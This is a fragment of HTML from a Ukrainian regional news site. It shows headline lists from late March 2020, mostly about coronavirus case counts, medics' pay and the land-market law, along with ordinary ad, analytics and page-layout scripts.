src="https://nikopolnews.net/img/81x54/d/20423235bb6dde9d0bbd9e532b9f0a841585646115extralarge-d163210a91b4728467737caf410a42da.jpg" alt="З квітня українським медикам збільшать зарплату" /></a></div><div class="jn-right"><h4> <a href="/ukraina/40-obshchestvo/15251-z-kvitnya-ukrajinskim-medikam-zbilshat-zarplatu"> З квітня українським медикам збільшать зарплату              </a></h4><div class="jn-info"></div></div></div></div><div class="jn"><div class="jn-head"><div class="jn-left"> <a href="/mir/49-proisshestviya/15250-u-niderlandakh-potsupili-kartinu-van-goga-iz-zakritogo-na-karantin-muzeyu-foto" title="У Нідерландах поцупили картину Ван Гога із закритого на карантин музею (фото)"><img src="https://nikopolnews.net/img/81x54/7/singerlaren-aab07ca172f6e7f7f4e8b4cad7601883.jpg" alt="У Нідерландах поцупили картину Ван Гога із закритого на карантин музею (фото)" /></a></div><div class="jn-right"><h4> <a href="/mir/49-proisshestviya/15250-u-niderlandakh-potsupili-kartinu-van-goga-iz-zakritogo-na-karantin-muzeyu-foto"> У Нідерландах поцупили картину Ван Гога із закритого на карантин музею (фото)              </a></h4><div class="jn-info"></div></div></div></div><div class="jn"><div class="jn-head"><div class="jn-left"> <a href="/ukraina/40-obshchestvo/15249-kilkist-vipadkiv-koronavirusu-v-ukrajini-stanom-na-31-bereznya-ta-regioni-poshirennya" title="Кількість випадків коронавірусу в Україні станом на 31 березня та регіони поширення"><img src="https://nikopolnews.net/img/81x54/f/moz20-1a5abb6a088385833223a77f73b5c63b.jpg" alt="Кількість випадків коронавірусу в Україні станом на 31 березня та регіони поширення" /></a></div><div class="jn-right"><h4> <a href="/ukraina/40-obshchestvo/15249-kilkist-vipadkiv-koronavirusu-v-ukrajini-stanom-na-31-bereznya-ta-regioni-poshirennya"> Кількість випадків коронавірусу в Україні станом на 31 березня та регіони поширення              </a></h4><div class="jn-info"></div></div></div></div><div class="jn"><div class="jn-head"><div class="jn-left"> <a href="/ukraina/43-politika/15248-khto-yak-golosuvav-za-rinok-zemli-u-vr" title="Хто як голосував за ринок землі у ВР"><img src="https://nikopolnews.net/img/81x54/e/ya14910-cc62430d27d70312d3a3d74699e57515.jpg" alt="Хто як голосував за ринок землі у ВР" /></a></div><div class="jn-right"><h4> <a href="/ukraina/43-politika/15248-khto-yak-golosuvav-za-rinok-zemli-u-vr"> Хто як голосував за ринок землі у ВР              </a></h4><div class="jn-info"></div></div></div></div></div></div><div class="modright"><div id="M551151ScriptRootC842242"></div><script src="https://jsc.idealmedia.io/n/i/nikopolnews.net.842242.js" async></script></div><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-4305834550386423" data-ad-slot="9583942834" data-ad-format="auto" data-full-width-responsive="true"></ins><script>
   (adsbygoogle = window.adsbygoogle || []).push({});
</script><amp-ad width="100vw" height="320" type="adsense" data-ad-client="ca-pub-4305834550386423" data-ad-slot="9583942834" data-auto-format="rspv" data-full-width=""><div overflow=""></div> </amp-ad><p><a href="https://besplatka.ua" rel="alternate noopener" target="_blank"><img alt="besplatka" src="/images/banners/besplatka.png" style="margin-left: auto; margin-right: auto; display: block;" /></a></p><div id="M551151ScriptRootC842242"></div><script src="https://jsc.idealmedia.io/n/i/nikopolnews.net.842242.js" async></script><div class="well hitstop"><h3 class="page-header">Найпопулярніше</h3><div class="junewsultra hitstop"><div class="jn"><div class="jn-head"><div class="jn-left"> <a href="/ukraina/40-obshchestvo/15205-kilkist-vipadkiv-koronavirusu-v-ukrajini-stanom-na-29-bereznya" title="Кількість випадків коронавірусу в Україні станом на 29 березня"><img src="https://nikopolnews.net/img/81x54/5/unnamed48-b5f86f3f51856637e361e4a40157e0e3.jpg" alt="Кількість випадків коронавірусу в Україні станом на 29 березня" /></a></div><div class="jn-right"><h4> <a href="/ukraina/40-obshchestvo/15205-kilkist-vipadkiv-koronavirusu-v-ukrajini-stanom-na-29-bereznya"> Кількість випадків коронавірусу в Україні станом на 29 березня              </a></h4><div class="jn-info"></div></div></div></div><div class="jn"><div class="jn-head"><div class="jn-left"> <a href="/ukraina/40-obshchestvo/15200-mozhet-ischeznut-svyaz-preduprezhdenie-ot-kievstara" title="Может исчезнуть связь: предупреждение от &amp;quot;Киевстара&amp;quot;"><img src="https://nikopolnews.net/img/81x54/1/7main-34f6ef88154798722754f1ecd05c42e9.jpg" alt="Может исчезнуть связь: предупреждение от &amp;quot;Киевстара&amp;quot;" /></a></div><div class="jn-right"><h4> <a href="/ukraina/40-obshchestvo/15200-mozhet-ischeznut-svyaz-preduprezhdenie-ot-kievstara"> Может исчезнуть связь: предупреждение от &quot;Киевстара&quot;              </a></h4><div class="jn-info"></div></div></div></div><div class="jn"><div class="jn-head"><div class="jn-left"> <a href="/mir/48-obshchestvo/15199-gde-spryatatsya-ot-koronavirusa-v-etikh-stranakh-poka-net-zabolevshikh" title="Где спрятаться от коронавируса: в этих странах пока нет заболевших"><img src="https://nikopolnews.net/img/81x54/9/546785678-7670408acc1129477ea4135a439f88f5.jpg" alt="Где спрятаться от коронавируса: в этих странах пока нет заболевших" /></a></div><div class="jn-right"><h4> <a href="/mir/48-obshchestvo/15199-gde-spryatatsya-ot-koronavirusa-v-etikh-stranakh-poka-net-zabolevshikh"> Где спрятаться от коронавируса: в этих странах пока нет заболевших              </a></h4><div class="jn-info"></div></div></div></div><div class="jn"><div class="jn-head"><div class="jn-left"> <a href="/ukraina/40-obshchestvo/15246-yak-ne-zanesti-virus-na-verkhnomu-odyazi-rekomendue-komarovskij" title="Як не занести вірус на верхньому одязі. Рекомендує Комаровський (Відео)"><img src="https://nikopolnews.net/img/81x54/c/39-3c7e2842ee742a00e4415e83f61d0122.jpg" alt="Як не занести вірус на верхньому одязі. Рекомендує Комаровський (Відео)" /></a></div><div class="jn-right"><h4> <a href="/ukraina/40-obshchestvo/15246-yak-ne-zanesti-virus-na-verkhnomu-odyazi-rekomendue-komarovskij"> Як не занести вірус на верхньому одязі. Рекомендує Комаровський (Відео)              </a></h4><div class="jn-info"></div></div></div></div><div class="jn"><div class="jn-head"><div class="jn-left"> <a href="/ukraina/43-politika/15247-zakon-o-zemle-prinyali-chego-zhdat-dalshe-detali" title="Закон о земле приняли. Чего ждать дальше - детали"><img src="https://nikopolnews.net/img/81x54/4/24486039-16e43c7f924f5cfa90d441eb25f3acf2.jpg" alt="Закон о земле приняли. Чего ждать дальше - детали" /></a></div><div class="jn-right"><h4> <a href="/ukraina/43-politika/15247-zakon-o-zemle-prinyali-chego-zhdat-dalshe-detali"> Закон о земле приняли. Чего ждать дальше - детали              </a></h4><div class="jn-info"></div></div></div></div></div></div></div></div></div></div><footer class="footer" role="contentinfo"><div class="container"><div class="containercopi"><h3>Новини України <strong>NNS</strong> ("Національна служба новин")</h3> Адреса редакції:&nbsp;Україна, Дніпропетровська обл., Нікополь<br /> E-mail:<a href="mailto:nikopol.net@ukr.net">&nbsp;nikopol.net@ukr.net</a><br /> Серія свідоцтва:&nbsp;ДП 2032-770Р (дата реєстрації&nbsp;23.10.2013)</p></div></div></footer><script>
jQuery(window).scroll(function(){
   if(jQuery(window).scrollTop()>40){
     jQuery('#logo').css('display','none');
     jQuery('#logo-small').css('display','block');
    }else{
     jQuery('#logo').css('display','block');
     jQuery('#logo-small').css('display','none');
    }
 });
</script><script type="text/javascript"ax:repeat="0">
	$(function() {
		$(window).scroll(function(){
			var distanceTop = $('#show').offset().top - $(window).height();
			if ($(window).scrollTop() > distanceTop)
				$('#slidebox').animate({'bottom':'0px'},300);
			else
				$('#slidebox').stop(true).animate({'bottom':'-505px'},200);
		});
		$('#slidebox .close').bind('click',function(){
			$(this).parent().remove();
		});
	});
</script><link rel="stylesheet" href="/plugins/content/smartresizer/smartresizer.css" /><style type="text/css">body.site { border-top: 3px solid #29475d; background-color: #ffffff; } a { color: #29475d; } .nav-list > .active > a, .nav-list > .active > a:hover, .dropdown-menu li > a:hover, .dropdown-menu .active > a, .dropdown-menu .active > a:hover, .nav-pills > .active > a, .nav-pills > .active > a:hover, .btn-primary { background: #29475d; }</style><script type="application/ld+json">{"@context":"https:\/\/schema.org","@type":"WebPage","name":"\u0417 \u043a\u0432\u0456\u0442\u043d\u044f \u0443\u043a\u0440\u0430\u0457\u043d\u0441\u044c\u043a\u0438\u043c \u043c\u0435\u0434\u0438\u043a\u0430\u043c \u0437\u0431\u0456\u043b\u044c\u0448\u0430\u0442\u044c \u0437\u0430\u0440\u043f\u043b\u0430\u0442\u0443","speakable":{"@type":"SpeakableSpecification","xpath":["\/html\/head\/title","\/html\/head\/meta[@name='description']\/@content"]},"url":"https:\/\/nikopolnews.net\/ukraina\/40-obshchestvo\/15251-z-kvitnya-ukrajinskim-medikam-zbilshat-zarplatu"}</script><script type="application/ld+json">{"@context":"https:\/\/schema.org","@type":"NewsArticle","headline":"\u0417 \u043a\u0432\u0456\u0442\u043d\u044f \u0443\u043a\u0440\u0430\u0457\u043d\u0441\u044c\u043a\u0438\u043c \u043c\u0435\u0434\u0438\u043a\u0430\u043c \u0437\u0431\u0456\u043b\u044c\u0448\u0430\u0442\u044c \u0437\u0430\u0440\u043f\u043b\u0430\u0442\u0443","name":"\u0417 \u043a\u0432\u0456\u0442\u043d\u044f \u0443\u043a\u0440\u0430\u0457\u043d\u0441\u044c\u043a\u0438\u043c \u043c\u0435\u0434\u0438\u043a\u0430\u043c \u0437\u0431\u0456\u043b\u044c\u0448\u0430\u0442\u044c \u0437\u0430\u0440\u043f\u043b\u0430\u0442\u0443","description":"\u0417 \u043a\u0432\u0456\u0442\u043d\u044f \u0423\u0440\u044f\u0434 \u0437\u0431\u0456\u043b\u044c\u0448\u0438\u0442\u044c \u0437\u0430\u0440\u043f\u043b\u0430\u0442\u0443 \u0443\u043a\u0440\u0430\u0457\u043d\u0441\u044c\u043a\u0438\u043c \u043c\u0435\u0434\u0438\u043a\u0430\u043c. \u041f\u0440\u043e \u0446\u0435 NNS \u043f\u043e\u0432\u0456\u0434\u043e\u043c\u043b\u044f\u0454 \u0437 \u043f\u043e\u0441\u0438\u043b\u0430\u043d\u043d\u044f\u043c \u043d\u0430 \u043e\u0444\u0456\u0446\u0456\u0439\u043d\u0438\u0439 \u0441\u0430\u0439\u0442 \u043f\u0440\u0435\u0437\u0438\u0434\u0435\u043d\u0442\u0430 \u0423\u043a\u0440\u0430\u0457\u043d\u0438. \u041f\u0440\u043e \u043f\u0456\u0434\u0432\u0438\u0449\u0435\u043d\u043d\u044f \u043e\u043f\u043b\u0430\u0442?","articleBody":"\r\n\r\n\u0417 \u043a\u0432\u0456\u0442\u043d\u044f \u0423\u0440\u044f\u0434 \u0437\u0431\u0456\u043b\u044c\u0448\u0438\u0442\u044c \u0437\u0430\u0440\u043f\u043b\u0430\u0442\u0443 \u0443\u043a\u0440\u0430\u0457\u043d\u0441\u044c\u043a\u0438\u043c \u043c\u0435\u0434\u0438\u043a\u0430\u043c. \u041f\u0440\u043e \u0446\u0435 NNS \u043f\u043e\u0432\u0456\u0434\u043e\u043c\u043b\u044f\u0454 \u0437 \u043f\u043e\u0441\u0438\u043b\u0430\u043d\u043d\u044f\u043c \u043d\u0430 \u043e\u0444\u0456\u0446\u0456\u0439\u043d\u0438\u0439 \u0441\u0430\u0439\u0442 \u043f\u0440\u0435\u0437\u0438\u0434\u0435\u043d\u0442\u0430 \u0423\u043a\u0440\u0430\u0457\u043d\u0438. \u041f\u0440\u043e \u043f\u0456\u0434\u0432\u0438\u0449\u0435\u043d\u043d\u044f \u043e\u043f\u043b\u0430\u0442\u0438 \u043f\u0440\u0430\u0446\u0456 \u043c\u0435\u0434\u0438\u043a\u0456\u0432 \u0437\u0430\u044f\u0432\u0438\u0432 \u043f\u0440\u0435\u043c'\u0454\u0440-\u043c\u0456\u043d\u0456\u0441\u0442\u0440 \u0423\u043a\u0440\u0430\u0457\u043d\u0438 \u0414\u0435\u043d\u0438\u0441 \u0428\u043c\u0438\u0433\u0430\u043b\u044c, \u0439\u0434\u0435\u0442\u044c\u0441\u044f \u0443 \u043f\u043e\u0432\u0456\u0434\u043e\u043c\u043b\u0435\u043d\u043d\u0456 \u043f\u0440\u0435\u0441\u0441\u043b\u0443\u0436\u0431\u0438 \u043f\u0440\u0435\u0437\u0438\u0434\u0435\u043d\u0442\u0430 \u0423\u043a","mainEntityOfPage":{"@type":"WebPage","@id":"https:\/\/nikopolnews.net\/ukraina\/40-obshchestvo\/15251-z-kvitnya-ukrajinskim-medikam-zbilshat-zarplatu"},"thumbnailUrl":"https:\/\/nikopolnews.net\/images\/2020\/20423235bb6dde9d0bbd9e532b9f0a84_1585646115_extra_large.jpg","image":{"@type":"ImageObject","url":"https:\/\/nikopolnews.net\/images\/2020\/20423235bb6dde9d0bbd9e532b9f0a84_1585646115_extra_large.jpg","height":506,"width":758},"dateCreated":"2020-03-31T13:39:08+01:00","dateModified":"2020-03-31T13:39:32+01:00","datePublished":"2020-03-31T13:39:08+01:00","interactionCount":"122","author":{"@type":"Person","name":"\u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440"},"publisher":{"@type":"Organization","name":"NNS - \u041d\u0430\u0446\u0456\u043e\u043d\u0430\u043b\u044c\u043d\u0430 \u0441\u043b\u0443\u0436\u0431\u0430 \u043d\u043e\u0432\u0438\u043d","logo":{"@type":"ImageObject","url":"https:\/\/nikopolnews.net\/images\/thumbnails\/60060.png","height":60,"width":600}}}</script><script async src="https://www.googletagmanager.com/gtag/js?id=UA-154914675-1"></script><script>
 window.dataLayer = window.dataLayer || [];
 function gtag(){dataLayer.push(arguments);}
 gtag('js', new Date());

 gtag('config', 'UA-154914675-1');
</script><script src="https://cdn.gravitec.net/storage/8a530aacfdbf04c76aa4a109a54c7fd5/client.js" async></script><script>
$('p').each(function() {
  var $this = $(this);
  if($this.html().replace(/\s|&nbsp;/g, '').length == 0)
    $this.remove();
});
</script><script async src="/templates/protostar/js/share.js"></script></body></html>